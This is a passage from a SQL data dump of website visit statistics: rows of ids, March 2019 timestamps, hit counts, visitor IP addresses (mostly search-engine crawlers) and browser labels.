,0,'54.36.148.206','other'),(403287,1553269954,1,1,0,0,'54.36.148.30','other'),(403288,1553270026,1,1,0,0,'66.249.66.138','chrome'),(403289,1553270103,1,1,0,0,'54.36.149.78','other'),(403290,1553270296,1,1,0,0,'207.46.13.188','other'),(403291,1553270518,1,1,0,0,'54.36.149.28','other'),(403292,1553270696,1,1,0,0,'207.46.13.176','other'),(403293,1553270892,1,1,0,0,'207.46.13.48','other'),(403294,1553271025,1,1,0,0,'54.36.148.33','other'),(403295,1553271047,1,1,0,0,'54.36.148.214','other'),(403296,1553271092,1,1,0,0,'54.36.150.17','other'),(403297,1553271119,1,1,0,0,'40.77.167.131','other'),(403298,1553271311,1,1,0,0,'5.45.207.19','other'),(403299,1553271357,1,1,0,0,'87.250.224.65','other'),(403300,1553271450,1,1,0,0,'54.36.150.54','other'),(403301,1553271557,1,1,0,0,'54.36.148.128','other'),(403302,1553271690,2,2,0,0,'141.8.142.103','other'),(403303,1553271900,1,1,0,0,'178.154.244.11','other'),(403304,1553271945,1,1,0,0,'54.36.149.33','other'),(403305,1553272081,1,1,0,0,'37.9.113.148','other'),(403306,1553272180,1,1,0,0,'91.196.178.101','chrome'),(403307,1553272232,1,1,0,0,'5.45.207.79','other'),(403308,1553272256,1,1,0,0,'54.36.150.84','other'),(403309,1553272483,1,1,0,0,'54.36.148.34','other'),(403310,1553272574,1,1,0,0,'54.36.150.25','other'),(403311,1553272873,1,1,0,0,'207.46.13.188','other'),(403312,1553273074,1,1,0,0,'54.36.150.150','other'),(403313,1553273375,1,1,0,0,'54.36.148.253','other'),(403314,1553273511,1,1,0,0,'54.36.150.48','other'),(403315,1553273669,1,1,0,0,'46.229.168.141','other'),(403316,1553273684,1,1,0,0,'54.36.148.125','other'),(403317,1553273686,1,1,0,0,'54.36.150.96','other'),(403318,1553274056,1,1,0,0,'54.36.149.20','other'),(403319,1553274409,1,1,0,0,'46.229.168.152','other'),(403320,1553274541,1,1,0,0,'54.36.150.109','other'),(403321,1553274743,1,1,0,0,'207.46.13.176','other'),(403322,1553274849,1,1,0,0,'95.163.255.48','other'),(403323,1553274991,1,1,0,0,'95.163.255.43','other'),(403324,1553275458,1,1,0,0,'180.76.15.145','other'),(403325,1553275465,1,1,0,0,'37.9.113.20','other'),(403326,1553275600,1,1,0,0,'54.36.148.217','other'),(403327,1553275640,1,1,0,0,'54.36.149.80','other'),(403328,1553275684,1,1,0,0,'207.46.13.188','other'),(403329,1553275716,1,1,0,0,'54.36.149.66','other'),(403330,1553275840,1,1,0,0,'91.196.178.43','chrome'),(403331,1553275892,1,1,0,0,'54.36.150.181','other'),(403332,1553275953,1,1,0,0,'141.8.142.103','other'),(403333,1553276548,1,1,0,0,'46.229.168.144','other'),(403334,1553276570,1,1,0,0,'54.36.150.17','other'),(403335,1553276957,1,1,0,0,'46.229.168.151','other'),(403336,1553277241,1,1,0,0,'54.36.148.174','other'),(403337,1553277677,1,1,0,0,'5.196.87.175','other'),(403338,1553278120,1,1,0,0,'66.249.64.29','chrome'),(403339,1553278149,1,1,0,0,'54.36.150.20','other'),(403340,1553278179,1,1,0,0,'54.36.150.62','other'),(403341,1553278253,1,1,0,0,'54.36.150.85','other'),(403342,1553278300,1,1,0,0,'157.55.39.237','other'),(403343,1553278465,1,1,0,0,'54.36.149.32','other'),(403344,1553278632,1,1,0,0,'54.36.149.79','other'),(403345,1553278683,1,1,0,0,'8.29.198.27','other'),(403346,1553278730,1,1,0,0,'8.29.198.25','other'),(403347,1553279049,1,1,0,0,'91.196.178.86','firefox'),(403348,1553279305,1,1,0,0,'207.46.13.4','other'),(403349,1553279355,1,1,0,0,'54.36.148.156','other'),(403350,1553279481,2,2,0,0,'66.249.64.31','chrome'),(403351,1553279685,1,1,0,0,'54.36.149.64','other'),(403352,1553279746,1,1,0,0,'54.36.150.73','other'),(403353,1553279961,1,1,0,0,'95.163.255.42','other'),(403354,1553280013,1,1,0,0,'66.249.64.30','chrome'),(403355,1553280272,1,1,0,0,'54.36.148.132','other'),(403356,1553280413,1,1,0,0,'95.163.255.49','other'),(403357,1553280551,1,1,0,0,'54.36.148.48','other'),(403358,1553280732,2,2,0,0,'37.52.141.195','chrome'),(403359,1553280930,1,1,0,0,'54.36.150.177','other'),(403360,1553281162,1,1,0,0,'46.229.168.143','other'),(403361,1553281168,1,1,0,0,'95.108.213.4','other'),(403362,1553281481,1,1,0,0,'54.36.148.243','other'),(403363,1553281656,1,1,0,0,'66.249.64.58','chrome'),(403364,1553281759,1,1,0,0,'82.145.211.19','other'),(403365,1553281909,1,1,0,0,'54.36.148.181','other'),(403366,1553282007,1,1,0,0,'92.112.125.252','chrome'),(403367,1553282139,1,1,0,0,'37.52.141.195','chrome'),(403368,1553282205,1,1,0,0,'54.36.149.97','other'),(403369,1553282538,1,1,0,0,'54.36.150.96','other'),(403370,1553282628,1,1,0,0,'157.55.39.237','other'),(403371,1553282976,1,1,0,0,'54.36.148.26','other'),(403372,1553283698,1,1,0,0,'66.249.64.31','chrome'),(403373,1553283881,1,1,0,0,'54.36.148.176','other'),(403374,1553284112,1,1,0,0,'46.211.65.17','chrome'),(403375,1553284118,1,1,0,0,'46.229.168.147','other'),(403376,1553284409,1,1,0,0,'54.36.150.101','other'),(403377,1553284410,1,1,0,0,'157.55.39.237','other'),(403378,1553284688,1,1,0,0,'54.36.150.54','other'),(403379,1553284776,1,1,0,0,'40.77.167.166','other'),(403380,1553285004,1,1,0,0,'54.36.148.33','other'),(403381,1553285024,1,1,0,0,'54.36.150.67','other'),(403382,1553285037,1,1,0,0,'46.229.168.154','other'),(403383,1553285253,1,1,0,0,'46.229.168.134','other'),(403384,1553285342,1,1,0,0,'54.36.150.91','other'),(403385,1553285438,1,1,0,0,'46.229.168.149','other'),(403386,1553285651,1,1,0,0,'54.36.150.68','other'),(403387,1553285822,1,1,0,0,'46.229.168.148','other'),(403388,1553286019,1,1,0,0,'141.8.183.23','other'),(403389,1553286140,1,1,0,0,'54.36.150.82','other'),(403390,1553286292,1,1,0,0,'54.36.150.167','other'),(403391,1553286400,2,2,0,0,'178.154.244.11','other'),(403392,1553286454,4,4,0,0,'5.45.207.19','other'),(403393,1553286727,1,1,0,0,'37.9.113.148','other'),(403394,1553287154,1,1,0,0,'46.229.168.132','other'),(403395,1553287199,1,1,0,0,'54.36.150.165','other'),(403396,1553287221,1,1,0,0,'54.36.148.156','other'),(403397,1553287233,1,1,0,0,'54.36.148.162','other'),(403398,1553287250,1,1,0,0,'209.17.96.66','other'),(403399,1553287384,1,1,0,0,'54.36.150.169','other'),(403400,1553287496,1,1,0,0,'178.154.244.11','other'),(403401,1553287566,2,2,0,0,'5.45.207.79','other'),(403402,1553287720,1,1,0,0,'87.250.224.47','other'),(403403,1553287813,1,1,0,0,'54.36.150.109','other'),(403404,1553287849,4,4,0,0,'95.108.213.4','other'),(403405,1553287930,1,1,0,0,'37.9.113.148','other'),(403406,1553289126,1,1,0,0,'54.36.149.57','other'),(403407,1553289341,1,1,0,0,'54.36.150.40','other'),(403408,1553289371,1,1,0,0,'46.229.168.148','other'),(403409,1553289463,1,1,0,0,'54.36.149.25','other'),(403410,1553289524,2,2,0,0,'8.29.198.26','other'),(403411,1553289549,1,1,0,0,'46.229.168.130','other'),(403412,1553289807,1,1,0,0,'54.36.150.31','other'),(403413,1553289851,1,1,0,0,'178.255.215.94','other'),(403414,1553290031,1,1,0,0,'157.55.39.2','other'),(403415,1553290034,1,1,0,0,'54.36.150.183','other'),(403416,1553290563,1,1,0,0,'40.77.167.180','other'),(403417,1553290758,1,1,0,0,'91.245.127.237','firefox'),(403418,1553291097,1,1,0,0,'95.163.255.47','other'),(403419,1553291102,1,1,0,0,'66.249.64.31','chrome'),(403420,1553291281,1,1,0,0,'54.36.150.23','other'),(403421,1553291561,1,1,0,0,'40.77.167.180','other'),(403422,1553291921,1,1,0,0,'54.36.149.20','other'),(403423,1553291994,1,1,0,0,'216.244.66.241','other'),(403424,1553292024,1,1,0,0,'54.36.150.186','other'),(403425,1553292127,1,1,0,0,'54.36.149.89','other'),(403426,1553292139,1,1,0,0,'66.249.64.29','chrome'),(403427,1553292153,1,1,0,0,'54.36.150.34','other'),(403428,1553292163,1,1,0,0,'54.36.148.47','other'),(403429,1553292331,1,1,0,0,'54.36.148.25','other'),(403430,1553292336,1,1,0,0,'46.229.168.151','other'),(403431,1553292713,1,1,0,0,'54.36.148.173','other'),(403432,1553293324,1,1,0,0,'54.36.148.97','other'),(403433,1553293443,1,1,0,0,'54.36.149.44','other'),(403434,1553293890,1,1,0,0,'54.36.149.101','other'),(403435,1553294335,1,1,0,0,'46.229.168.134','other'),(403436,1553294361,1,1,0,0,'40.77.167.180','other'),(403437,1553294374,1,1,0,0,'46.229.168.135','other'),(403438,1553294418,1,1,0,0,'66.249.64.30','chrome'),(403439,1553294481,1,1,0,0,'66.249.64.62','chrome'),(403440,1553294566,1,1,0,0,'54.36.149.60','other'),(403441,1553294951,3,3,0,0,'87.250.224.65','other'),(403442,1553294985,1,1,0,0,'178.154.171.24','other'),(403443,1553295100,1,1,0,0,'37.9.113.148','other'),(403444,1553295103,1,1,0,0,'178.154.244.49','other'),(403445,1553295149,1,1,0,0,'46.229.168.140','other'),(403446,1553295204,1,1,0,0,'5.45.207.8','other'),(403447,1553295215,2,2,0,0,'178.154.244.11','other'),(403448,1553295218,1,1,0,0,'213.180.203.9','other'),(403449,1553295320,2,2,0,0,'37.9.113.103','other'),(403450,1553295412,1,1,0,0,'5.255.253.22','other'),(403451,1553295494,1,1,0,0,'13.57.233.99','chrome'),(403452,1553295513,1,1,0,0,'95.108.213.4','other'),(403453,1553295522,1,1,0,0,'54.36.148.111','other'),(403454,1553295531,1,1,0,0,'54.36.150.177','other'),(403455,1553295588,1,1,0,0,'87.250.224.47','other'),(403456,1553295748,1,1,0,0,'54.36.150.21','other'),(403457,1553295792,3,3,0,0,'5.45.207.79','other'),(403458,1553295797,1,1,0,0,'5.45.207.19','other'),(403459,1553296125,1,1,0,0,'40.77.167.180','other'),(403460,1553296216,3,3,0,0,'178.154.244.11','other'),(403461,1553296497,1,1,0,0,'95.108.181.54','other'),(403462,1553296523,1,1,0,0,'54.36.150.37','other'),(403463,1553296779,2,2,0,0,'40.77.167.182','other'),(403464,1553297417,2,2,0,0,'66.249.64.29','chrome'),(403465,1553297440,1,1,0,0,'54.36.148.233','other'),(403466,1553297468,1,1,0,0,'46.229.168.144','other'),(403467,1553297739,1,1,0,0,'54.36.148.253','other'),(403468,1553297757,1,1,0,0,'66.249.64.31','chrome'),(403469,1553297813,1,1,0,0,'216.244.66.241','other'),(403470,1553298291,1,1,0,0,'40.77.167.180','other'),(403471,1553298881,1,1,0,0,'54.36.148.182','other'),(403472,1553299156,1,1,0,0,'157.55.39.2','other'),(403473,1553299560,1,1,0,0,'40.77.167.180','other'),(403474,1553299578,1,1,0,0,'66.249.64.31','chrome'),(403475,1553300176,1,1,0,0,'46.229.168.152','other'),(403476,1553300283,1,1,0,0,'54.36.150.168','other'),(403477,1553300287,1,1,0,0,'54.36.148.79','other'),(403478,1553300313,1,1,0,0,'54.36.150.111','other'),(403479,1553300371,1,1,0,0,'8.29.198.26','other'),(403480,1553300435,1,1,0,0,'8.29.198.27','other'),(403481,1553300523,1,1,0,0,'54.36.148.224','other'),(403482,1553300558,1,1,0,0,'54.36.148.250','other'),(403483,1553301808,1,0,1,0,'66.249.64.29',''),(403484,1553301870,1,1,0,0,'5.45.207.19','other'),(403485,1553301986,1,1,0,0,'46.229.168.132','other'),(403486,1553302150,1,1,0,0,'213.180.203.9','other'),(403487,1553302152,1,1,0,0,'54.36.150.104','other'),(403488,1553302190,1,1,0,0,'95.108.181.54','other'),(403489,1553302214,1,1,0,0,'5.45.207.79','other'),(403490,1553302237,1,1,0,0,'54.36.148.159','other'),(403491,1553302262,1,1,0,0,'157.55.39.2','other'),(403492,1553302384,1,1,0,0,'40.77.167.182','other'),(403493,1553302408,1,1,0,0,'54.36.150.176','other'),(403494,1553302639,1,1,0,0,'54.36.150.119','other'),(403495,1553302775,1,1,0,0,'54.36.150.5','other'),(403496,1553302782,1,1,0,0,'54.36.148.115','other'),(403497,1553302807,1,1,0,0,'54.36.148.196','other'),(403498,1553302883,1,1,0,0,'46.229.168.153','other'),(403499,1553303011,2,2,0,0,'95.163.255.49','other'),(403500,1553303114,1,1,0,0,'5.45.207.19','other'),(403501,1553303286,1,1,0,0,'54.36.150.135','other'),(403502,1553303437,4,4,0,0,'40.77.167.182','other'),(403503,1553303441,4,4,0,0,'40.77.167.180','other'),(403504,1553303447,3,3,0,0,'157.55.39.2','other'),(403505,1553303451,3,3,0,0,'40.77.167.179','other'),(403506,1553303489,1,1,0,0,'95.163.255.48','other'),(403507,1553303613,1,1,0,0,'46.229.168.141','other'),(403508,1553303625,1,1,0,0,'66.249.64.30','chrome'),(403509,1553303811,1,1,0,0,'46.229.168.135','other'),(403510,1553303902,1,1,0,0,'178.154.244.11','other'),(403511,1553303974,1,1,0,0,'54.36.148.236','other'),(403512,1553304239,1,1,0,0,'46.229.168.143','other'),(403513,1553304440,1,1,0,0,'54.36.150.157','other'),(403514,1553304670,1,1,0,0,'5.45.207.19','other'),(403515,1553304695,1,1,0,0,'40.77.167.179','other'),(403516,1553304940,1,1,0,0,'54.36.149.84','other'),(403517,1553305083,1,1,0,0,'54.36.148.194','other'),(403518,1553305298,1,1,0,0,'54.36.148.86','other'),(403519,1553305378,1,1,0,0,'40.77.167.180','other'),(403520,1553305708,1,1,0,0,'54.36.149.48','other'),(403521,1553306200,1,1,0,0,'180.76.15.142','other'),(403522,1553306724,1,1,0,0,'54.36.150.189','other'),(403523,1553306729,1,1,0,0,'54.36.150.69','other'),(403524,1553307138,1,1,0,0,'54.36.148.2','other'),(403525,1553307303,1,1,0,0,'54.36.149.102','other'),(403526,1553307587,1,1,0,0,'54.36.148.234','other'),(403527,1553307776,4,4,0,0,'66.249.64.31','chrome'),(403528,1553308200,1,1,0,0,'46.229.168.135','other'),(403529,1553308427,1,1,0,0,'54.36.148.112','other'),(403530,1553308447,1,1,0,0,'66.249.64.60','chrome'),(403531,1553308514,1,1,0,0,'54.36.150.2','other'),(403532,1553308664,1,1,0,0,'95.108.213.4','other'),(403533,1553308688,1,1,0,0,'54.36.150.129','other'),(403534,1553308880,1,1,0,0,'178.154.244.11','other'),(403535,1553309393,1,1,0,0,'54.36.148.72','other'),(403536,1553309611,1,1,0,0,'157.55.39.243','other'),(403537,1553309878,1,1,0,0,'66.249.64.31','chrome'),(403538,1553309896,2,2,0,0,'66.249.64.30','chrome'),(403539,1553310157,1,1,0,0,'46.229.168.154','other'),(403540,1553310173,1,1,0,0,'66.249.64.62','chrome'),(403541,1553310329,1,1,0,0,'54.36.148.125','other'),(403542,1553310727,1,1,0,0,'128.69.144.84','msie'),(403543,1553310738,1,1,0,0,'46.229.168.147','other'),(403544,1553310858,1,1,0,0,'46.229.168.133','other'),(403545,1553311215,2,2,0,0,'8.29.198.27','other'),(403546,1553311301,1,1,0,0,'46.229.168.130','other'),(403547,1553311310,1,1,0,0,'54.36.148.40','other'),(403548,1553311331,1,1,0,0,'54.36.150.129','other'),(403549,1553311361,1,1,0,0,'54.36.148.230','other'),(403550,1553311437,1,1,0,0,'54.36.150.84','other'),(403551,1553311438,1,1,0,0,'109.74.154.72','chrome'),(403552,1553311473,1,1,0,0,'54.36.148.6','other'),(403553,1553311618,1,1,0,0,'54.36.150.55','other'),(403554,1553311709,2,2,0,0,'207.46.13.35','other'),(403555,1553311729,1,1,0,0,'157.55.39.207','other'),(403556,1553311735,1,1,0,0,'54.36.148.243','other'),(403557,1553311801,1,1,0,0,'54.36.148.221','other'),(403558,1553312229,1,1,0,0,'54.36.148.201','other'),(403559,1553312455,1,1,0,0,'54.36.149.7','other'),(403560,1553312562,1,1,0,0,'66.249.64.30','chrome'),(403561,1553312593,1,1,0,0,'54.36.150.68','other'),(403562,1553312652,1,1,0,0,'46.229.168.149','other'),(403563,1553312967,1,1,0,0,'5.196.87.172','other'),(403564,1553313386,1,1,0,0,'54.36.150.72','other'),(403565,1553313697,1,1,0,0,'54.36.150.46','other'),(403566,1553313762,2,2,0,0,'157.55.39.111','other'),(403567,1553313793,1,1,0,0,'46.229.168.149','other'),(403568,1553314063,1,1,0,0,'66.249.64.30','chrome'),(403569,1553314125,1,1,0,0,'66.249.64.58','chrome'),(403570,1553314242,1,1,0,0,'54.36.148.232','other'),(403571,1553314648,2,2,0,0,'157.55.39.207','other'),(403572,1553314793,1,1,0,0,'46.229.168.141','other'),(403573,1553315240,1,1,0,0,'54.36.148.194','other'),(403574,1553315328,1,1,0,0,'5.45.207.19','other'),(403575,1553315377,1,1,0,0,'54.36.148.14','other'),(403576,1553315470,2,2,0,0,'66.249.64.60','chrome'),(403577,1553315564,1,1,0,0,'46.229.168.130','other'),(403578,1553315716,1,1,0,0,'46.229.168.133','other'),(403579,1553315753,1,1,0,0,'54.36.148.45','other'),(403580,1553316013,1,1,0,0,'180.76.15.20','other'),(403581,1553316117,1,1,0,0,'54.36.150.136','other'),(403582,1553316147,1,1,0,0,'54.36.148.221','other'),(403583,1553316253,2,2,0,0,'66.249.64.29','chrome'),(403584,1553316382,1,1,0,0,'66.249.64.30','chrome'),(403585,1553316579,1,1,0,0,'37.9.113.148','other'),(403586,1553316658,1,1,0,0,'213.180.203.9','other'),(403587,1553316849,4,4,0,0,'5.45.207.19','other'),(403588,1553316971,1,1,0,0,'54.36.150.168','other'),(403589,1553317029,1,1,0,0,'54.36.148.168','other'),(403590,1553317273,1,1,0,0,'178.154.244.11','other'),(403591,1553317398,1,1,0,0,'37.9.113.20','other'),(403592,1553317415,2,2,0,0,'157.55.39.76','other'),(403593,1553317875,1,1,0,0,'46.211.132.123','chrome'),(403594,1553317951,1,1,0,0,'91.196.178.135','firefox'),(403595,1553317976,1,1,0,0,'180.163.220.66','chrome'),(403596,1553318441,2,2,0,0,'157.55.39.76','other'),(403597,1553318643,1,1,0,0,'66.249.64.31','chrome'),(403598,1553318832,1,1,0,0,'46.229.168.143','other'),(403599,1553319071,2,2,0,0,'66.249.64.30','chrome'),(403600,1553319094,1,1,0,0,'54.36.148.22','other'),(403601,1553319144,2,2,0,0,'54.245.71.229','chrome'),(403602,1553319351,1,1,0,0,'5.196.87.172','other'),(403603,1553319362,1,1,0,0,'66.249.64.62','chrome'),(403604,1553319478,1,1,0,0,'54.36.149.18','other'),(403605,1553319480,1,1,0,0,'46.229.168.151','other'),(403606,1553319612,1,1,0,0,'37.9.113.20','other'),(403607,1553320068,1,1,0,0,'54.36.148.99','other'),(403608,1553320093,1,1,0,0,'54.36.149.0','other'),(403609,1553320347,1,1,0,0,'54.36.150.45','other'),(403610,1553320680,1,1,0,0,'66.249.64.30','chrome'),(403611,1553320868,1,1,0,0,'66.249.64.62','chrome'),(403612,1553320870,1,1,0,0,'54.36.148.76','other'),(403613,1553320961,1,1,0,0,'46.229.168.129','other'),(403614,1553321709,1,1,0,0,'54.36.148.129','other'),(403615,1553321800,1,1,0,0,'54.36.150.155','other'),(403616,1553321808,1,1,0,0,'176.8.90.56','chrome'),(403617,1553322058,2,2,0,0,'8.29.198.27','other'),(403618,1553322336,1,1,0,0,'31.220.40.54','other'),(403619,1553322369,1,1,0,0,'51.255.65.46','other'),(403620,1553322521,1,1,0,0,'54.36.150.55','other'),(403621,1553323174,1,1,0,0,'66.249.64.58','chrome'),(403622,1553323729,1,1,0,0,'54.36.149.103','other'),(403623,1553324154,1,1,0,0,'54.36.150.80','other'),(403624,1553324298,1,1,0,0,'54.36.149.51','other'),(403625,1553324485,1,1,0,0,'46.229.168.137','other'),(403626,1553324487,1,1,0,0,'54.36.148.80','other'),(403627,1553324722,1,1,0,0,'37.9.113.148','other'),(403628,1553325306,1,1,0,0,'157.55.39.76','other'),(403629,1553325818,1,1,0,0,'54.36.148.68','other'),(403630,1553326101,1,1,0,0,'54.36.150.20','other'),(403631,1553326154,1,1,0,0,'178.154.244.11','other'),(403632,1553326275,1,1,0,0,'46.229.168.153','other'),(403633,1553326339,1,1,0,0,'54.36.150.116','other'),(403634,1553326442,2,2,0,0,'95.108.213.4','other'),(403635,1553326800,2,2,0,0,'5.45.207.79','other'),(403636,1553326814,3,3,0,0,'5.45.207.19','other'),(403637,1553326913,1,1,0,0,'54.36.150.178','other'),(403638,1553327011,1,1,0,0,'54.36.148.153','other'),(403639,1553327132,1,1,0,0,'46.229.168.140','other'),(403640,1553327185,1,1,0,0,'54.36.148.140','other'),(403641,1553327187,1,1,0,0,'54.36.148.59','other'),(403642,1553327401,1,1,0,0,'54.36.149.45','other'),(403643,1553327616,1,1,0,0,'54.36.148.118','other'),(403644,1553327664,1,1,0,0,'37.9.113.20','other'),(403645,1553327718,1,1,0,0,'213.180.203.9','other'),(403646,1553327865,1,1,0,0,'66.249.64.58','chrome'),(403647,1553328000,1,1,0,0,'66.249.64.29','chrome'),(403648,1553328154,1,1,0,0,'85.238.102.236','chrome'),(403649,1553328298,1,1,0,0,'66.249.64.62','chrome'),(403650,1553328750,1,1,0,0,'66.249.64.31','chrome'),(403651,1553328997,1,1,0,0,'40.77.167.3','other'),(403652,1553329165,1,1,0,0,'40.77.167.133','other'),(403653,1553329349,1,1,0,0,'54.36.148.15','other'),(403654,1553329784,1,1,0,0,'54.36.148.118','other'),(403655,1553329841,1,1,0,0,'54.36.148.1','other'),(403656,1553329861,1,1,0,0,'54.36.149.81','other'),(403657,1553329876,1,1,0,0,'46.229.168.138','other'),(403658,1553329932,1,1,0,0,'54.36.148.205','other'),(403659,1553330358,1,1,0,0,'66.249.64.30','chrome'),(403660,1553330461,1,1,0,0,'46.229.168.145','other'),(403661,1553330776,1,1,0,0,'46.229.168.153','other'),(403662,1553330840,1,1,0,0,'54.36.149.70','other'),(403663,1553331156,1,1,0,0,'54.36.148.35','other'),(403664,1553331315,1,1,0,0,'54.36.148.157','other'),(403665,1553331458,1,1,0,0,'54.36.150.124','other'),(403666,1553331917,1,1,0,0,'46.229.168.145','other'),(403667,1553332181,1,1,0,0,'54.36.150.64','other'),(403668,1553332207,1,1,0,0,'54.36.149.100','other'),(403669,1553332346,1,1,0,0,'66.249.64.31','chrome'),(403670,1553332529,1,1,0,0,'66.249.64.62','chrome'),(403671,1553332574,1,1,0,0,'66.249.64.29','chrome'),(403672,1553332909,1,1,0,0,'8.29.198.27','other'),(403673,1553332991,1,1,0,0,'46.229.168.149','other'),(403674,1553332994,1,1,0,0,'8.29.198.25','other'),(403675,1553333519,1,1,0,0,'54.36.150.89','other'),(403676,1553333566,1,1,0,0,'207.46.13.90','other'),(403677,1553333578,1,1,0,0,'54.36.150.85','other'),(403678,1553333966,1,1,0,0,'40.77.167.124','other'),(403679,1553334350,1,1,0,0,'54.36.150.185','other'),(403680,1553334378,1,1,0,0,'54.36.149.62','other'),(403682,1553334419,1,1,0,0,'54.36.149.83','other'),(403683,1553334722,1,1,0,0,'54.36.148.165','other'),(403684,1553334841,2,2,0,0,'5.45.207.19','other'),(403685,1553334845,2,2,0,0,'95.108.213.4','other'),(403686,1553334869,1,1,0,0,'37.9.113.148','other'),(403687,1553334884,1,1,0,0,'3.89.253.133','other'),(403688,1553335202,1,1,0,0,'46.229.168.144','other'),(403689,1553335205,2,2,0,0,'5.45.207.79','other'),(403690,1553335281,1,1,0,0,'54.36.149.86','other'),(403691,1553335355,3,3,0,0,'178.154.244.11','other'),(403692,1553335373,1,1,0,0,'54.36.148.52','other'),(403693,1553335481,1,1,0,0,'207.46.13.90','other'),(403694,1553335523,1,1,0,0,'66.249.64.30','chrome'),(403695,1553335532,1,1,0,0,'40.77.167.124','other'),(403696,1553335597,2,2,0,0,'87.250.224.47','other'),(403697,1553335724,1,1,0,0,'66.249.64.58','chrome'),(403698,1553335732,1,1,0,0,'141.8.142.108','other'),(403699,1553335807,1,1,0,0,'54.36.150.134','other'),(403700,1553335880,1,1,0,0,'66.249.64.31','chrome'),(403701,1553336021,1,1,0,0,'54.36.148.217','other'),(403702,1553336046,1,1,0,0,'95.108.213.4','other'),(403703,1553336227,1,1,0,0,'54.36.150.83','other'),(403704,1553336329,1,1,0,0,'54.36.148.144','other'),(403705,1553336456,1,1,0,0,'52.53.201.78','chrome'),(403706,1553336689,1,1,0,0,'207.46.13.210','other'),(403707,1553337319,1,1,0,0,'66.249.64.29','chrome'),(403708,1553337400,1,1,0,0,'95.108.213.4','other'),(403709,1553337641,1,1,0,0,'54.36.148.188','other'),(403710,1553337745,1,1,0,0,'54.36.149.30','other'),(403711,1553338021,1,1,0,0,'46.229.168.132','other'),(403712,1553338275,1,1,0,0,'46.229.168.142','other'),(403713,1553339014,1,1,0,0,'207.46.13.210','other'),(403714,1553339204,1,1,0,0,'54.36.148.132','other'),(403715,1553339370,1,1,0,0,'54.36.149.78','other'),(403716,1553339382,1,1,0,0,'54.36.148.166','other'),(403717,1553339546,1,1,0,0,'40.77.167.168','other'),(403718,1553339750,1,1,0,0,'54.36.150.155','other'),(403719,1553339914,1,1,0,0,'54.36.150.93','other'),(403720,1553339918,1,1,0,0,'54.36.149.31','other'),(403721,1553340106,1,1,0,0,'46.229.168.145','other'),(403722,1553340559,1,1,0,0,'54.36.150.143','other'),(403723,1553340849,1,1,0,0,'66.249.64.31','chrome'),(403724,1553341054,1,1,0,0,'46.229.168.133','other'),(403725,1553341442,1,1,0,0,'54.36.150.161','other'),(403726,1553341454,1,1,0,0,'54.36.148.37','other'),(403727,1553341643,1,1,0,0,'46.229.168.150','other'),(403728,1553341809,3,3,0,0,'95.108.213.4','other'),(403729,1553341949,4,4,0,0,'5.45.207.19','other'),(403730,1553342192,1,1,0,0,'87.250.224.47','other'),(403731,1553342208,1,1,0,0,'37.9.113.103','other'),(403732,1553342425,1,1,0,0,'178.154.244.11','other'),(403733,1553342434,1,1,0,0,'37.9.113.148','other'),(403734,1553342803,1,1,0,0,'66.249.64.31','chrome'),(403735,1553342949,1,1,0,0,'66.249.64.29','chrome'),(403736,1553343156,1,1,0,0,'54.36.148.205','other'),(403737,1553343460,1,1,0,0,'54.36.148.203','other'),(403738,1553343747,1,1,0,0,'8.29.198.26','other'),(403739,1553343842,1,1,0,0,'8.29.198.27','other'),(403740,1553343936,1,1,0,0,'66.249.64.30','chrome'),(403741,1553343963,1,1,0,0,'54.36.148.241','other'),(403742,1553344401,1,1,0,0,'66.249.64.60','chrome'),(403743,1553344461,2,2,0,0,'207.46.13.213','other'),(403744,1553344691,1,1,0,0,'54.36.148.1','other'),(403745,1553344804,1,1,0,0,'40.77.167.168','other'),(403746,1553345272,1,1,0,0,'54.36.148.202','other'),(403747,1553346733,1,1,0,0,'66.249.64.58','chrome'),(403748,1553346984,1,1,0,0,'66.249.64.30','chrome'),(403749,1553347103,1,1,0,0,'176.107.58.151','chrome'),(403750,1553347287,1,1,0,0,'66.249.64.31','chrome'),(403751,1553347368,1,1,0,0,'54.36.148.182','other'),(403752,1553347521,1,1,0,0,'54.36.149.77','other'),(403753,1553347780,1,1,0,0,'66.249.64.29','chrome'),(403754,1553347866,1,1,0,0,'54.36.150.57','other'),(403755,1553348161,1,1,0,0,'46.229.168.135','other'),(403756,1553348381,1,1,0,0,'5.196.87.172','other'),(403757,1553348414,1,1,0,0,'54.36.148.185','other'),(403758,1553348428,1,1,0,0,'66.249.64.31','chrome'),(403759,1553348602,1,1,0,0,'54.36.148.248','other'),(403760,1553348823,1,1,0,0,'95.108.213.4','other'),(403761,1553348831,1,1,0,0,'157.55.39.148','other'),(403762,1553349007,1,1,0,0,'54.36.149.102','other'),(403763,1553349080,1,1,0,0,'54.36.148.118','other'),(403764,1553349347,1,1,0,0,'5.45.207.19','other'),(403765,1553349554,1,1,0,0,'54.36.150.71','other'),(403766,1553349594,1,1,0,0,'54.36.150.103','other'),(403767,1553349648,1,1,0,0,'54.36.148.219','other'),(403768,1553349883,1,1,0,0,'54.36.150.171','other'),(403769,1553350549,2,2,0,0,'66.249.64.29','chrome'),(403770,1553351207,1,1,0,0,'54.36.148.243','other'),(403771,1553351221,1,1,0,0,'46.229.168.149','other'),(403772,1553351222,1,1,0,0,'54.36.148.119','other'),(403773,1553351291,1,1,0,0,'54.36.148.13','other'),(403774,1553351293,1,1,0,0,'178.154.244.11','other'),(403775,1553351366,1,1,0,0,'54.36.149.13','other'),(403776,1553351433,1,1,0,0,'54.36.150.80','other'),(403777,1553351703,1,1,0,0,'46.229.168.145','other'),(403778,1553351828,2,2,0,0,'66.249.64.60','chrome'),(403779,1553351869,1,1,0,0,'46.229.168.130','other'),(403780,1553351901,2,2,0,0,'66.249.64.31','chrome'),(403781,1553352756,1,1,0,0,'5.196.87.175','other'),(403782,1553352840,1,1,0,0,'46.229.168.151','other'),(403783,1553353064,1,1,0,0,'66.249.64.29','chrome'),(403784,1553353115,1,1,0,0,'66.249.64.62','chrome'),(403785,1553353215,1,1,0,0,'209.17.97.26','other'),(403786,1553353794,1,1,0,0,'54.36.149.11','other'),(403787,1553354245,1,1,0,0,'66.249.64.29','chrome'),(403788,1553354370,1,1,0,0,'66.249.64.30','chrome'),(403789,1553354588,1,1,0,0,'8.29.198.25','other'),(403790,1553354629,1,1,0,0,'54.36.149.76','other'),(403791,1553354696,1,1,0,0,'8.29.198.26','other'),(403792,1553354802,1,1,0,0,'54.36.149.64','other'),(403793,1553355305,1,1,0,0,'91.196.178.185','chrome'),(403794,1553355537,2,2,0,0,'5.45.207.19','other'),(403795,1553355572,1,1,0,0,'54.36.148.133','other'),(403796,1553355594,1,1,0,0,'207.46.13.213','other'),(403797,1553355712,1,1,0,0,'37.9.113.148','other'),(403798,1553355811,2,2,0,0,'66.249.64.29','chrome'),(403799,155335